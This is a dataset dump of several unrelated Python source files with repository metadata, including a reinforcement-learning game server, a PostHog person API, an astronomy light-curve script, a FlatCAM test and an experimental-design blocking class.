holes_df['equivalent_diameter'] = round(holes_df['equivalent_diameter'] * pixels_to_microns)
holes_df['area'] = round(holes_df['area'] * pixels_to_microns **2)
holes_df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsholesNIR_df.pkl")
print("--- %s minutes ---" % ((time.time() - start_time)/60))
|
[
"juanreto@gmail.com"
] |
juanreto@gmail.com
|
e048ecf2bf1cfedf302f50a696e79ffb86f316b1
|
db5f9683e06afffb1657b3919d302af4eb1c0b2a
|
/miscellaneous/infomaterial/create_state/main.py
|
aa8c08dce913169c02dad351c576de4fccd2ffc4
|
[
"MIT"
] |
permissive
|
Birkenpapier/informaticup21
|
a071e515acac8a60d5cd0fe3d4918fcbf21e3f04
|
193ff04be765dc5f11206f75eb3225cfeb94eb87
|
refs/heads/master
| 2023-03-25T17:51:36.380575
| 2021-01-17T19:24:14
| 2021-01-17T19:24:14
| 352,364,199
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,280
|
py
|
import make_decision as make_d
import pylogging as IC20log
import tensorflow as tf
import numpy as np
import time
import os
from bottle import post, request, run, BaseRequest
from keras.utils import to_categorical
from drl_agent.DQN import DQNAgent
from create_training_data import *
from random import randint
from game_state import *
from PIL import Image
init_action = None
state_init1 = None
state_init2 = None
state_old = None
counter_games = 0
game_state = game_state()
agent = DQNAgent()
def reward_function(game):
if game["round"] == 1:
return 0
if game["outcome"] == 'pending':
return 1 # + game["population_reduction"] * 3
elif game["outcome"] == 'win':
return 20
elif game["outcome"] == 'loss':
return -20
def init_game(game):
global state_init1
state_init1 = game
action = [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0] # init action without changes or moves
return action
def init_game_next(game_json, game, action):
global state_init1
global state_init2
state_init2 = game
reward1 = reward_function(game_json)
done = None
if reward1 == 20 or reward1 == -20:
done = True
else:
done = False
agent.remember(state_init1, action, reward1, done)
@post("/")
def index():
global init_action
global counter_games
global state_old
game = request.json
print(f'-----------------------> round: {game["round"]}, outcome: {game["outcome"]}')
game_state.update_state(game)
if game is not None:
state = create_save_TD(game_state)
try:
if game["round"] == 1:
init_action = init_game(state)
init_action = {"type": "endRound"}
return init_action
if game["round"] == 2:
init_action_next = init_game_next(game, state, init_action)
# TODO here comes the answer from the agent
except Exception as e:
IC20log.getLogger("Index").error(str(e))
# print(f"this is the action: {action}")
agent.epsilon = 80 - counter_games
try:
state_old = np.hstack(state) # how to safe the old state after the call of the method?
# perform random actions based on agent.epsilon, or choose the action
if randint(0, 200) < agent.epsilon:
final_move = to_categorical(randint(0, 11), num_classes=12)
print(f"final_move based random: {final_move}")
else:
# predict action based on the old state
state_old = np.hstack(state)
prediction = agent.model.predict(state_old.reshape((1, 4450)))
final_move = to_categorical(np.argmax(prediction[0]), num_classes=12)
print(f"final_move based prediction: {final_move}")
# perform new move and get new state
state_new = np.hstack(state)
# set reward for the new state
reward = reward_function(game)
except Exception as e:
IC20log.getLogger("Index").error(str(e))
done = None
if reward == 20 or reward == -20:
done = True
else:
done = False
# store the new data into a long term memory
agent.remember(state_old, final_move, reward, done)
if game["outcome"] == 'loss' or game["outcome"] == 'win':
counter_games += 1
elif game["outcome"] == 'win':
img = Image.open('./data/hiclipart.png')
img.show()
# saving the trained model
if counter_games == 20:
agent.model.save_weights('weights.hdf5')
counter_games += 1
print(f"counter_games: {counter_games}")
action = make_d.Action.create_Action(game_state, final_move)
return action
if __name__ == '__main__':
port = 50123
# Workaround for the current problem of incopability to work with CUDA and TF -> using CPU this way in code
# os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
os.environ['CUDA_VISIBLE_DEVICES'] = ''
if tf.test.gpu_device_name():
print('[DEBUG] GPU found')
else:
print("[DEBUG] No GPU found")
# till here Workaround
IC20log.getLogger("Server Main").info("starting server at Port %s" % port )
BaseRequest.MEMFILE_MAX = 10 * 1024 * 1024
run(host="0.0.0.0", port=port, quiet=True)
|
[
"kevin@peivareh.com"
] |
kevin@peivareh.com
|
77921aade12cd93cfbbbffb1e59a7444b7ad84c1
|
d0d088be9ba855fbc1798d55a0874faee192d8b5
|
/posthog/api/person.py
|
e1d035c0bd7b0f564145380d16c7e281ae576d71
|
[
"MIT"
] |
permissive
|
pplonski/posthog
|
bf62d1bfb36a007adb180faecd418a8d1337f904
|
9ae6854254085bbe10cc4f9c98820d9efed52424
|
refs/heads/master
| 2021-01-08T17:36:18.303885
| 2020-02-20T19:38:07
| 2020-02-20T19:38:07
| 242,096,368
| 2
| 0
|
MIT
| 2020-02-21T09:00:14
| 2020-02-21T09:00:14
| null |
UTF-8
|
Python
| false
| false
| 2,781
|
py
|
from posthog.models import Event, Team, Person, PersonDistinctId
from rest_framework import serializers, viewsets, response, request
from rest_framework.decorators import action
from django.db.models import Q, Prefetch, QuerySet, Subquery, OuterRef
from .event import EventSerializer
from typing import Union
from .base import CursorPagination
class PersonSerializer(serializers.HyperlinkedModelSerializer):
last_event = serializers.SerializerMethodField()
name = serializers.SerializerMethodField()
class Meta:
model = Person
fields = ['id', 'name', 'distinct_ids', 'properties', 'last_event', 'created_at']
def get_last_event(self, person: Person) -> Union[dict, None]:
if not self.context['request'].GET.get('include_last_event'):
return None
last_event = Event.objects.filter(team_id=person.team_id, distinct_id__in=person.distinct_ids).order_by('-timestamp').first()
if last_event:
return {'timestamp': last_event.timestamp}
else:
return None
def get_name(self, person: Person) -> str:
if person.properties.get('email'):
return person.properties['email']
if len(person.distinct_ids) > 0:
return person.distinct_ids[-1]
return person.pk
class PersonViewSet(viewsets.ModelViewSet):
queryset = Person.objects.all()
serializer_class = PersonSerializer
pagination_class = CursorPagination
def _filter_request(self, request: request.Request, queryset: QuerySet) -> QuerySet:
if request.GET.get('id'):
people = request.GET['id'].split(',')
queryset = queryset.filter(id__in=people)
if request.GET.get('search'):
parts = request.GET['search'].split(' ')
contains = []
for part in parts:
if ':' in part:
queryset = queryset.filter(properties__has_key=part.split(':')[1])
else:
contains.append(part)
queryset = queryset.filter(properties__icontains=' '.join(contains))
queryset = queryset.prefetch_related(Prefetch('persondistinctid_set', to_attr='distinct_ids_cache'))
return queryset
def get_queryset(self):
queryset = super().get_queryset()
team = self.request.user.team_set.get()
queryset = queryset.filter(team=team)
queryset = self._filter_request(self.request, queryset)
return queryset.order_by('-id')
@action(methods=['GET'], detail=False)
def by_distinct_id(self, request):
person = self.get_queryset().get(persondistinctid__distinct_id=str(request.GET['distinct_id']))
return response.Response(PersonSerializer(person, context={'request': request}).data)
|
[
"tim.glaser@hiberly.com"
] |
tim.glaser@hiberly.com
|
6eda11f72415c2c9a36b7f5635e2560ef63bf01a
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/pg_1318+062/sdB_pg_1318+062_lc.py
|
ff49a4e872dad3cb97afe62d31f086a25e90d3e8
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[200.185083,5.983667], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_pg_1318+062/sdB_pg_1318+062_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
4c1da163636e9dd3c700a82633474e2178f8f902
|
16234b1ac9e2e2cb64c2e44dfb938525046a0d33
|
/tests/test_vispy_plot.py
|
add3abf99799d98b6e7d8345985a7738a940b24c
|
[
"MIT"
] |
permissive
|
cmsteinBR/FlatCAM
|
8c0b41e2ea63a7c942c77cd1e4fc286b7b99da93
|
f6e492916776384bdf3af28367679c2ae02c926a
|
refs/heads/master
| 2021-01-18T00:22:07.056830
| 2016-08-04T16:08:55
| 2016-08-04T16:08:55
| 66,869,807
| 1
| 0
| null | 2016-08-29T18:32:44
| 2016-08-29T18:32:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,660
|
py
|
import sys
import unittest
from PyQt4 import QtGui, QtCore
from FlatCAMApp import App
from VisPyPatches import apply_patches
import random
import logging
class VisPyPlotCase(unittest.TestCase):
"""
This is a top-level test covering the Gerber-to-GCode
generation workflow.
THIS IS A REQUIRED TEST FOR ANY UPDATES.
"""
filenames = ['test', 'test1', 'test2', 'test3', 'test4']
def setUp(self):
self.app = QtGui.QApplication(sys.argv)
apply_patches()
# Create App, keep app defaults (do not load
# user-defined defaults).
self.fc = App()
self.fc.log.setLevel(logging.ERROR)
def tearDown(self):
del self.fc
del self.app
def test_flow(self):
for i in range(100):
print "Test #", i + 1
# Open test project
self.fc.open_project('tests/project_files/' + self.filenames[random.randint(0, len(self.filenames) - 1)])
print "Project", self.fc.project_filename
# Wait for project loaded and plotted
while True:
self.sleep(500)
if self.fc.proc_container.view.text.text() == 'Idle.' or self.fc.ui.isHidden():
break
# Interrupt on window close
if self.fc.ui.isHidden():
break
# Create new project and wait for a random time
self.fc.on_file_new()
self.sleep(random.randint(100, 1000))
def sleep(self, time):
timer = QtCore.QTimer()
el = QtCore.QEventLoop()
timer.singleShot(time, el, QtCore.SLOT("quit()"))
el.exec_()
|
[
"denis_vic@mail.ru"
] |
denis_vic@mail.ru
|
02d4497caa6522455555c81d2715262be07fb67f
|
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
|
/python/python_24610.py
|
ed0905d8047a088ab943cc1e32bc4dbc7d30b821
|
[] |
no_license
|
AK-1121/code_extraction
|
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
|
5297a4a3aab3bb37efa24a89636935da04a1f8b6
|
refs/heads/master
| 2020-05-23T08:04:11.789141
| 2015-10-22T19:19:40
| 2015-10-22T19:19:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
# Why int() argument must be a string or a number, not 'list'?
PForm
|
[
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] |
ubuntu@ip-172-31-7-228.us-west-2.compute.internal
|
76063ba8a654410eb9a78179fbe0b90a12bb85ad
|
32a0cb40ad22c725f41984d8d234589bdd4cb58f
|
/module_3/tasks/re_1.py
|
a79e75aed30ef0f4cf1be51358aa3f18fa714ae8
|
[] |
no_license
|
egolov/stepic-python
|
2ef7b201d47dc73388b61a01fb864ec978b8d1d2
|
c160c9ef752c0a4dd82217917909ee5547a1e583
|
refs/heads/master
| 2020-03-20T02:15:07.400710
| 2018-06-12T17:20:49
| 2018-06-12T17:20:49
| 137,105,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 240
|
py
|
import re
# вхождение 'cat' более двух раз
pattern_1 = r".*cat.*cat"
pattern_2 = r"cat"
print(re.match(pattern_1, "abc cat and cat abc")) # is not None
print(re.findall(pattern_2, "abc cat and cat abc")) # len() > 1
|
[
"e-golov@yandex-team.ru"
] |
e-golov@yandex-team.ru
|
f6d5899459cd4b1b222d2d880badb5acd97d8ffb
|
ee82b3b34449187dc34ac22afa49d490b8f94831
|
/design/optblock.py
|
1622f3770f44d819e43c3a4b4b6a06f08c4e6328
|
[
"MIT"
] |
permissive
|
raddanki/softblock
|
2d16c0acbcdfbf969f489ab5a832e55c15ec4cc7
|
25f1ed61a0ab4c377e0b57546b57287bb90667bf
|
refs/heads/master
| 2023-04-05T03:08:00.549190
| 2021-04-26T13:27:45
| 2021-04-26T13:27:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
py
|
#! /usr/bin/python3
from sklearn.neighbors import DistanceMetric
import numpy as np
from .nbpMatch import nbpwrap
from .design import Design
class OptBlock(Design):
def __init__(self, treatment_prob: float = 0.5):
self.treatment_prob = treatment_prob
super(OptBlock, self).__init__()
def fit(self, X: np.ndarray, distance="mahalanobis") -> None:
N = X.shape[0]
if N % 2 == 1:
idx_ignore = np.random.choice(N, 1).item()
else:
idx_ignore = None
self.X = X
if distance == "mahalanobis":
inv_cov = np.linalg.pinv(np.cov(X, rowvar=False))
dist_maker = DistanceMetric.get_metric("mahalanobis", VI=inv_cov)
elif distance == "euclidean":
dist_maker = DistanceMetric.get_metric("euclidean")
else:
raise NotImplementedError(
"Only Mahalanobis and Euclidean distance are implemented."
)
distances = dist_maker.pairwise(X)
if idx_ignore is not None:
dist_ignore = distances[idx_ignore, :]
dist_ignore[idx_ignore] = np.inf
idx_nn = np.argmin(dist_ignore)
distances = np.delete(np.delete(distances, idx_ignore, 0), idx_ignore, 1)
n_to_pass = N if idx_ignore is None else N - 1
self.matches = nbpwrap(wt=distances.T.reshape(-1), n=n_to_pass)
# nbpwrap indexes from 1.
self.matches = self.matches - 1
blocks = {tuple(sorted(x)) for x in enumerate(self.matches)}
self.blocks = [list(block) for block in blocks]
self.block_membership = np.array([-1] * N)
for block_id, block in enumerate(blocks):
for member_idx, member in enumerate(block):
if idx_ignore is not None:
if member == idx_nn:
self.blocks[block_id].append(idx_ignore)
self.block_membership[idx_ignore] = block_id
if member >= idx_ignore:
self.block_membership[member+1] = block_id
self.blocks[block_id][member_idx] = member + 1
else:
self.block_membership[member] = block_id
def assign(self, X: np.ndarray) -> np.ndarray:
if X is None:
X = self.X
elif X is self.X:
pass
else:
raise ValueError("Can't go out of sample here.")
N = X.shape[0]
A = np.array([0] * N)
for block in self.blocks:
M = len(block)
En_trt = M * self.treatment_prob
n_trt = int(max(1, np.floor(En_trt)))
n_ctl = int(max(1, np.floor(M - En_trt)))
n_extra = int(np.floor(M - n_trt - n_ctl))
a_extra = int(np.random.choice([0, 1], 1).item())
n_trt += a_extra * n_extra
trted = np.random.choice(M, n_trt, replace=False)
for unit in trted:
A[block[unit]] = 1
return A
|
[
"arbour@Davids-MacBook-Pro.local"
] |
arbour@Davids-MacBook-Pro.local
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.